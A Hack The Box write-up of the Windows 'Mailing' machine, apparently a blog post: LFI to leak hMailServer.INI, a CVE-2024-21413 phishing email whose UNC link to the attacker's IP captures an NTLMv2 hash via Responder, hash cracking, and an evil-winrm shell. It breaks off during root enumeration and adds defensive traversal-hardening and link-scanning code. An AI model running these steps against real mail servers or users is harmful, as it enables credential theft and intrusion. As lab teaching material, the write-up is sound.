
Mailing
Hack The Box Machine Writeup

I'm not sure I even know how to mail a letter anymore...
Summary
Mailing was an easy Windows box that could likely have been rated medium. It centers around mail services and exploiting hMailServer, along with a lot of enumeration and finding public exploits. There are some cool techniques involved, such as stealing an NTLM hash using CVE-2024-21413 and privilege escalation using CVE-2023-2255 with Python to evade Windows Defender.
The user section begins with enumerating a website that contains a download function vulnerable to LFI. This can be used to leak the hMailServer.INI configuration file and obtain the admin account's password hash. The hash can be cracked and used to interact with the mail server. Leveraging this account and CVE-2024-21413, the attacker steals the Maya user's NTLMv2 hash, which can be cracked and used with evil-winrm to get a user shell and grab user.txt.
The root step was, for me, slightly harder than the user step and involved a lot of enumeration and quite a bit of time. It starts by finding a PowerShell script in the admin user's directory that opens every ODT file in the Important Documents directory. The attacker also finds that LibreOffice is installed in a version vulnerable to command execution through CVE-2023-2255. Using a public PoC for the exploit, the attacker can generate a malicious ODT file that runs a command when opened. This can be uploaded to the Important Documents directory, and when the administrator user opens it through their PowerShell script it results in a reverse shell, completing the box once a basic Defender configuration is bypassed using Python.

Un-ironically politicians every 4 years in America
User
Recon
Port Scan With Nmap
I started off with an nmap scan to see what ports are open on the host and what we can interact with. I use -sC to run the default NSE enumeration scripts and -sV for version detection. Running it with sudo defaults to a SYN (-sS) scan, which is faster than the -sT connect scan that is the default without root permissions.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV 10.129.28.249
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-06 20:04 BST
Nmap scan report for 10.129.28.249
Host is up (0.010s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: NAMESPACE RIGHTS=texkA0001 SORT ACL CHILDREN OK QUOTA completed CAPABILITY IMAP4rev1 IDLE IMAP4
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: NAMESPACE RIGHTS=texkA0001 SORT ACL CHILDREN OK QUOTA completed CAPABILITY IMAP4rev1 IDLE IMAP4
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-06T19:04:30
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.79 seconds
From the scan we can see the standard Windows ports 135, 139 and 445 (RPC, NetBIOS and SMB). There is also a web server on port 80 with a redirect to mailing.htb, which I will add to my /etc/hosts file. Finally, there is a whole bunch of mail related ports: SMTP on the normal port 25 but also on 465 (SMTP over TLS) and 587 (submission with STARTTLS), and the mailbox protocols POP3 on 110 and IMAP on 143 and 993.
Virtual Host Fuzz With Wfuzz
Whenever I have a custom domain like mailing.htb I like to run a brute force fuzzing scan to see if there are any virtual hosts to discover. The --hh flag hides responses by their length in characters (the Chars column). I could quickly tell that anything with a '.' in it causes a 400 error, so I also filter on the 334 character response length.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ wfuzz -u http://mailing.htb -H "Host:FUZZ.mailing.htb" -w /opt/useful/SecLists/Discovery/Web-Content/raft-medium-words.txt --hh 4681,334
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://mailing.htb/
Total requests: 63087
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 63087
Filtered Requests: 63087
Requests/sec.: 0
This scan does not find anything of value this time around.
Web Server Enumeration
Next up for basic enumeration is the website on port 80. There appears to be a single page titled "Mailing - The ultimate mail server". The page mentions it is powered by hMailServer, something to check later for public exploits. Lastly, at the bottom of the page there is a Download Instructions button.
pretty pictures
Clicking the download button gives us instructions.pdf, which contains step by step instructions for connecting to the mailing.htb mail server.
PDFs when doing CTF machines almost always contain hints or creds
The key information from this PDF seems to be the private IP of the mail server, 192.168.0.105, which appears to be the host behind the mailing.htb virtual host.
Private IP addresses are always useful
At the very bottom there is also a reference to a Maya user, possibly someone we need to send a phishing payload to?
Never discount the possibility of a phishing attack
At this point I ran a brute force directory scan with Feroxbuster against the site. I added -x asp,aspx since I know from the Nmap scan that it is running on IIS.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ feroxbuster -u http://mailing.htb/ -w /opt/useful/SecLists/Discovery/Web-Content/raft-medium-words.txt -x asp,aspx -q
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 42l 159w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 5w 31c http://mailing.htb/download.php
301 GET 2l 10w 160c http://mailing.htb/assets => http://mailing.htb/assets/
200 GET 1144l 5804w 695263c http://mailing.htb/assets/background_image.jpg
200 GET 132l 375w 4681c http://mailing.htb/
200 GET 2932l 17970w 1477653c http://mailing.htb/assets/mayabendito.jpg
200 GET 3l 25w 541c http://mailing.htb/assets/
301 GET 2l 10w 160c http://mailing.htb/Assets => http://mailing.htb/Assets/
200 GET 2485l 15038w 1505848c http://mailing.htb/assets/ruyalonso.jpg
200 GET 17977l 103391w 11149863c http://mailing.htb/assets/johnsmith.jpg
200 GET 3l 25w 541c http://mailing.htb/Assets/
301 GET 2l 10w 166c http://mailing.htb/instructions => http://mailing.htb/instructions/
200 GET 3l 13w 289c http://mailing.htb/instructions/
301 GET 2l 10w 166c http://mailing.htb/Instructions => http://mailing.htb/Instructions/
200 GET 3l 13w 289c http://mailing.htb/Instructions/
Scanning: http://mailing.htb/
Scanning: http://mailing.htb/assets/
Scanning: http://mailing.htb/Assets/
Scanning: http://mailing.htb/instructions/
Scanning: http://mailing.htb/Instructions/
This reveals /instructions, which has directory listing enabled and simply shows the instructions.pdf we already downloaded. There is also a download.php which responds with "No file specified for download". This interests me as a possible LFI vector for later if we can figure out how to pass it a file.

Is that Shaggy from Scooby-Doo?!
LFI To Leak hMailServer.INI
Intercepting the request for instructions.pdf with Burp, we can see how the download.php endpoint is used.
Time to check for that LFI
HackTricks has a great LFI section from which I pulled some Windows payloads to try. I was able to confirm the LFI by reading the Windows hosts file.
No filtering to bypass at all, Ez Pz
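As an added illustration (my code, not the box's download.php nor anything from the post), here is the flaw class behind this step next to a hardened version. It is written in Python with ntpath so the Windows path semantics can be checked offline; the download root, file names and sample payloads are assumptions.

```python
import ntpath
from typing import Optional

# Constructed for this example: the folder the download endpoint is meant to serve from
DOWNLOAD_ROOT = r"C:\wwwroot\instructions"
ALLOWED_EXTENSIONS = {".pdf"}


def vulnerable_resolve(name: str) -> str:
    """The flaw in its simplest form: the user-supplied name is joined to the
    root with no validation, and the filesystem then normalises the result.
    Two things go wrong on Windows:
      - '..' segments walk out of the root once the path is normalised
      - ntpath.join throws the root away entirely when the name carries a
        drive letter or is absolute, so 'C:\\...' is served as-is
    """
    return ntpath.normpath(ntpath.join(DOWNLOAD_ROOT, name))


def hardened_resolve(name: str) -> Optional[str]:
    """Return the on-disk path to serve, or None if the request is rejected.

    The endpoint only ever serves flat files from DOWNLOAD_ROOT, so the check
    is an allow-list: a bare file name with a permitted extension.
    """
    if not name or "\x00" in name:
        return None
    # No drive letters, absolute or UNC paths, and no directory separators of
    # either flavour (IIS accepts '/' as well as '\').
    drive, _ = ntpath.splitdrive(name)
    if drive or ntpath.isabs(name) or "\\" in name or "/" in name:
        return None
    # A colon elsewhere in the name would address an alternate data stream.
    if ":" in name:
        return None
    if ntpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    candidate = ntpath.normpath(ntpath.join(DOWNLOAD_ROOT, name))
    # Defence in depth: after normalisation the result must still sit inside
    # the root. commonpath raises on differing drives, which cannot happen
    # here because drive letters were already rejected above.
    root = ntpath.normpath(DOWNLOAD_ROOT)
    if ntpath.commonpath([root, candidate]).lower() != root.lower():
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: the legitimate file, a traversal and an absolute path
    for requested in ("instructions.pdf",
                      r"..\..\Windows\System32\drivers\etc\hosts",
                      r"C:\Program Files (x86)\hMailServer\Data\hMailServer.INI"):
        print(f"{requested!r}")
        print(f"  vulnerable -> {vulnerable_resolve(requested)}")
        print(f"  hardened   -> {hardened_resolve(requested)}")
```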
Look at Hmail Source
At this point I had no idea what files to look for, so I used the link on the website to go to the hMailServer documentation. There I found the default install directory.
Checking documentation is a strong habit to build
I also found the folder structure of the application.
Now we are getting somewhere!
I did not find any useful filenames in the documentation (maybe from me not looking hard enough?), so I used Google to look for public exploits and other information. I came across hMailServer 4.4.2 - 'PHPWebAdmin' File Inclusion, which mentions a file hMailServer.INI that contains the administrator's password. This seems like a good thing to look for, but it does not appear to reside in the default path. So I put all the folders discovered in the documentation into a list for fuzzing.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ cat path.txt
/Addons
/Bin
/Data
/DBScripts
/Events
/Languages
/Logs
/MySQL
/PHPWebAdmin
/Temp
From here I sent the LFI request to Intruder in Burp, selected the correct field, and attempted to fuzz the directory to find the hMailServer.INI file.
Intruder in BURP free is okay for small lists
I then went to the payloads tab and loaded my list and executed the fuzzing attack.
Nothing, RIP
This did not find the file. Windows also has the Program Files (x86) directory, however, so I tried that next.
As offsec would say, Try Harder
This time the attack worked and I found the file in the Data folder. This config file gives loads of useful information, such as the administrator password hash and the database password.
Got em!
From the exploit we found, we can assume the administrator hash is MD5 and throw it into CrackStation. The hash cracks to homenetworkingadministrator. The exploit also mentions how to decrypt the database password; we might come back to that later, though, as it seems to require access to the web admin dashboard.

There is still no patch to the gun zero-day
Stealing NTLM Hash With CVE-2024-21413
Now armed with a user account and password we should be able to connect to the mail server. Following the instructions PDF we downloaded earlier, I installed Thunderbird and set up an account with the user name administrator, the email address administrator@mailing.htb and the cracked password homenetworkingadministrator. There does not appear to be anything of use in the administrator user's mailbox, however.
Why you no have mail
Remembering the mention in the instructions PDF of the Maya user reading emails, I next tried sending a phishing email to the maya@mailing.htb account. I started off by simply including a link to a Python web server to see if a bot would click it.
When in doubt, go phishing
This did not work, however, and at this point I was stuck for a little while trying a bunch of different phishing techniques. Eventually I remembered this was a Windows box and wondered if I could get the Maya user's NTLM hash through a UNC path. Googling around I came across a brand new CVE for Outlook that looked promising: CVE-2024-21413. It mentions NTLM leakage, so that sounds like what I am looking for.
I needed something to catch the NTLM authentication, so I started Responder and then executed the PoC script with the administrator credentials found earlier, using a \\ UNC path as the link in the hope that it would cause NTLM authentication against my Responder SMB server.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.234\test' --subject test
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
✅ Email sent successfully.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
<...>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.28.249
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:d46f969f15b8bffe:C0C80E34838AD323802D0E39658F0FAC:010100000000000000F89C8C0CA0DA01FADFA10D2F916F8100000000020008004A0038004100530001001E00570049004E002D0049005000500052004D00570041003800520048004E0004003400570049004E002D0049005000500052004D00570041003800520048004E002E004A003800410053002E004C004F00430041004C00030014004A003800410053002E004C004F00430041004C00050014004A003800410053002E004C004F00430041004C000700080000F89C8C0CA0DA01060004000200000008003000300000000000000000000000002000003056A30FBFDF79F2F8D3D32EF8031C01AACFE42D3FB6F7CCB6B5FE3529EF70250A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200330034000000000000000000
This works, and after a couple of seconds we receive Maya's NTLMv2 hash. Looking at the Hashcat example hashes we can see we need mode 5600 (NetNTLMv2).
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<...>
MAYA::MAILING:dac4fe0aec512cc8:0abf7016c9d7428230e543395441dbcd:<...>:m4y4ngs4ri
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: MAYA::MAILING:dac4fe0aec512cc8:0abf7016c9d7428230e5...000000
Time.Started.....: Mon May 6 22:13:25 2024 (3 secs)
Time.Estimated...: Mon May 6 22:13:28 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1953.3 kH/s (1.67ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5935104/14344385 (41.38%)
Rejected.........: 0/5935104 (0.00%)
Restore.Point....: 5931008/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m6161 -> m3808w
Started: Mon May 6 22:13:09 2024
Stopped: Mon May 6 22:13:29 2024
The hash cracks to m4y4ngs4ri for the Maya account.
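For the defensive side of the phishing step above, here is an added example (my code, not from the post or the PoC author) that scans a mail message for the kind of link that makes a Windows mail client reach out to an SMB share: file: scheme hyperlinks and bare UNC paths. The sample message is constructed and the addresses and host in it are placeholders.

```python
import email
import re
from email import policy
from html.parser import HTMLParser

# A bare UNC path: \\host\share...
UNC_RE = re.compile(r"^\\\\[^\\\s]+")
FILE_SCHEME_RE = re.compile(r"^file:", re.IGNORECASE)


class _LinkExtractor(HTMLParser):
    """Collect href targets from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        for name, value in attrs:
            if name.lower() == "href" and value:
                self.links.append(value.strip())


def classify_link(href):
    """Return a reason string if the link would make the client talk SMB, else None."""
    target = href.strip()
    if FILE_SCHEME_RE.match(target):
        reason = "file: scheme link"
        # The reported CVE-2024-21413 variant carries a '!' suffix in the file: link;
        # note it separately so the alert is more specific.
        if "!" in target:
            reason += " with '!' moniker suffix"
        return reason
    if UNC_RE.match(target):
        return "bare UNC path"
    return None


def extract_links(msg):
    """Hyperlinks from text/html parts plus UNC/file tokens from text/plain parts."""
    links = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "text/html":
            parser = _LinkExtractor()
            parser.feed(part.get_content())
            links.extend(parser.links)
        elif ctype == "text/plain":
            links.extend(t for t in part.get_content().split() if classify_link(t))
    return links


def scan_message(raw):
    """Parse an RFC 5322 message and return [(link, reason), ...] for suspicious links."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for href in extract_links(msg):
        reason = classify_link(href)
        if reason:
            findings.append((href, reason))
    return findings


# Constructed sample: one benign https link, one UNC path, one file: link with a '!' suffix.
SAMPLE_MESSAGE = r"""From: sender@example.invalid
To: recipient@example.invalid
Subject: test
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please review \\203.0.113.10\share\report.txt or https://example.invalid/report

--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Please review <a href="https://example.invalid/report">the report</a> or
<a href="file:///\\203.0.113.10\share\report.txt!x">the shared copy</a>.</p></body></html>

--b1--
"""

if __name__ == "__main__":
    for link, reason in scan_message(SAMPLE_MESSAGE):
        print(f"{reason}: {link}")
```

The same check can be run over messages pulled from the hMailServer data directory or a mail gateway; blocking outbound SMB (445) from clients to the internet is the complementary network control.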

Internal penetration tests be like
Shell as Maya
We can confirm the maya:m4y4ngs4ri creds with CrackMapExec. We can also list the shares and see that Maya has read access to Important Documents.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.129.28.249 -u maya -p m4y4ngs4ri --shares
SMB 10.129.28.249 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.28.249 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.129.28.249 445 MAILING [+] Enumerated shares
SMB 10.129.28.249 445 MAILING Share Permissions Remark
SMB 10.129.28.249 445 MAILING ----- ----------- ------
SMB 10.129.28.249 445 MAILING ADMIN$ Admin remota
SMB 10.129.28.249 445 MAILING C$ Recurso predeterminado
SMB 10.129.28.249 445 MAILING Important Documents READ
SMB 10.129.28.249 445 MAILING IPC$ READ IPC remota
We can use the spider module to check what is in the share and discover that it is seemingly empty. Using the regex flag with '.' matches everything.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.129.28.249 -u maya -p m4y4ngs4ri --spider 'Important Documents' --regex .
SMB 10.129.28.249 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.28.249 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.129.28.249 445 MAILING [*] Started spidering
SMB 10.129.28.249 445 MAILING [*] Spidering .
SMB 10.129.28.249 445 MAILING //10.129.28.249/Important Documents/. [dir]
SMB 10.129.28.249 445 MAILING //10.129.28.249/Important Documents/.. [dir]
SMB 10.129.28.249 445 MAILING [*] Done spidering (Completed in 0.06515336036682129)
Checking WinRM with the Maya creds, the Pwn3d! message tells us we can get code execution.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ crackmapexec winrm 10.129.28.249 -u maya -p m4y4ngs4ri
SMB 10.129.28.249 5985 MAILING [*] Windows 10.0 Build 19041 (name:MAILING) (domain:MAILING)
HTTP 10.129.28.249 5985 MAILING [*] http://10.129.28.249:5985/wsman
WINRM 10.129.28.249 5985 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
Lastly, I used evil-winrm to connect to the Mailing machine and get a user shell, grabbing user.txt from the desktop.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ evil-winrm -i 10.129.28.249 -u maya -p m4y4ngs4ri
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Desktop> cat user.txt
3c5197ef063ea720bfb0aa98e332eb4b
Danny DeVito is amazing
Root
Enumeration
Manual Recon
Looking around the box, it quickly becomes apparent that it is in Spanish. Checking whoami /all does not reveal any interesting privileges or groups (at least as far as I can tell, since the output is in Spanish).
*Evil-WinRM* PS C:\Users\maya\documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobación de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
Looking in the Maya user's Documents folder, there are _mail.py_ and _mail.vbs_. These appear to be the bot scripts that open Maya's mailbox and click links in new messages, which is what allowed us to steal Maya's NTLMv2 hash.
*Evil-WinRM* PS C:\Users\maya\documents> cat "C:/Users/maya/documents/mail.py"
from pywinauto.application import Application
from pywinauto import Desktop
from pywinauto.keyboard import send_keys
from time import sleep

# Attach to the already running Windows Mail window via the UI Automation backend
app = Application(backend="uia").connect(title_re="Inbox*")
dlg = app.top_window()
current_count = 0
remove = 2
while True:
    try:
        unread = dlg.InboxListBox
        items = unread.item_count()
        if items==1:
            sleep(20)
            continue
        if items != current_count:
            # Walk the newly arrived messages, open each one and invoke its hyperlink
            for i in range(1,items-current_count-(remove-1)):
                if "Yesterday" in unread.texts()[i][0]:
                    remove = 3
                    continue
                unread[i].select()
                message = dlg.child_window(auto_id="RootFocusControl", control_type="Document").Hyperlink.invoke()
                sleep(45)
                dlg.type_keys("{ENTER}")
                unread[i].select()
            current_count = items - remove
        sleep(20)
    except:
        pass
*Evil-WinRM* PS C:\Users\maya\documents> cat "C:/Users/maya/documents/mail.vbs"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "explorer shell:AppsFolder\microsoft.windowscommunicationsapps_8wekyb3d8bbwe!microsoft.windowslive.mail"
WScript.Sleep 5000
objShell.AppActivate "Mail"
WScript.Sleep 1000
objShell.SendKeys "{F5}"
WScript.Sleep 500
objShell.SendKeys "{ENTER}"
WScript.Sleep 500
objShell.SendKeys "{TAB}"
WScript.Sleep 500
objShell.SendKeys "{ENTER}"
WScript.Sleep 500
objShell.SendKeys "{ENTER}"
WScript.Sleep 500
objShell.SendKeys "^d"
WScript.Sleep 500
objShell.SendKeys "%{F4}"
Looking at the root of C:, there are a couple of interesting directories to look through, such as _Important Documents_, which we found to be empty through SMB.
*Evil-WinRM* PS C:\> ls
Directory: C:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwroot
The PHP directory seems to contain a copy of PHP and we are not able to access the wwwroot directory.
Looking at the local listening ports with netstat does not reveal anything of particular note. Listing the installed software from the registry, we can see Python is there, which may help us later.
*Evil-WinRM* PS C:\users\maya> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Where-Object {$_.DisplayName -ne $null}
DisplayName DisplayVersion Publisher
----------- -------------- ---------
hMailServer 5.6.8-B2574
Microsoft Edge 124.0.2478.67 Microsoft Corporation
Microsoft Edge Update 1.3.185.29
WebView2 Runtime de Microsoft Edge 124.0.2478.67 Microsoft Corporation
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.32.31326 14.32.31326.0 Microsoft Corporation
Python Launcher 3.12.2150.0 Python Software Foundation
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.32.31326 14.32.31326 Microsoft Corporation
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.32.31326 14.32.31326.0 Microsoft Corporation
Microsoft .NET SDK 8.0.201 (x64) 8.2.124.11405 Microsoft Corporation
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.32.31326 14.32.31326 Microsoft Corporation
Microsoft SQL Server Compact 3.5 ENU
The Uninstall registry key is not always complete, though, so I also checked the Program Files and Program Files (x86) directories manually. Here LibreOffice stood out right away, since this is a Windows machine and LibreOffice is more commonly seen on Linux.
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
I also ran a search for any PowerShell script files on the host and found _soffice.ps1_ in the localadmin user's directory.
PS C:\users> Get-ChildItem -Path C:\users\ -Recurse -Filter *.ps1
Get-ChildItem -Path C:\users\ -Recurse -Filter *.ps1
Directory: C:\users\localadmin\Documents\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2024-04-30 4:37 PM 841 soffice.ps1
Looking at this script it becomes clear that the administrator user is opening every ODT file found in "C:\Important Documents" with LibreOffice and then deleting it, furthering my suspicion that LibreOffice is the path to root.
PS C:\users\localadmin\Documents\scripts> type soffice.ps1
# Define the directory containing the .odt files
$directory = "C:\Important Documents\"
# Get all .odt files in the directory
$odtFiles = Get-ChildItem -Path $directory -Filter *.odt
# Loop through each .odt file
foreach ($file in $odtFiles) {
    # Start LibreOffice and open the current .odt file
    $fileName = $file.FullName
    Start-Process "C:\Program Files\LibreOffice\program\soffice.exe" -ArgumentList "--headless --view --norestore", "`"$fileName`""
    # Wait for LibreOffice to fully open the document
    Start-Sleep -Seconds 5 # Adjust the delay as needed
    # Wait for the document to close
    Start-Sleep -Seconds 5 # Adjust the delay as needed
    Stop-Process -Name "soffice" -force
    # Delete the .odt file
    Remove-Item -Path $file.FullName -Force
}
Remove-Item 'C:\Important Documents\*' -Recurse -Force
Automatic Enumeration
At this point I brought over winPEAS by uploading it with Evil-WinRM.
*Evil-WinRM* PS C:\users> cd maya
*Evil-WinRM* PS C:\users\maya> upload /home/htb-mp-904224/Desktop/winPEASany.exe
Info: Uploading /home/htb-mp-904224/Desktop/winPEASany.exe to C:\users\maya\winPEASany.exe
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
However, when attempting to run it, it appears to be blocked by Windows Defender! This makes the escalation step much more difficult.
*Evil-WinRM* PS C:\users\maya> ./winPEASany.exe
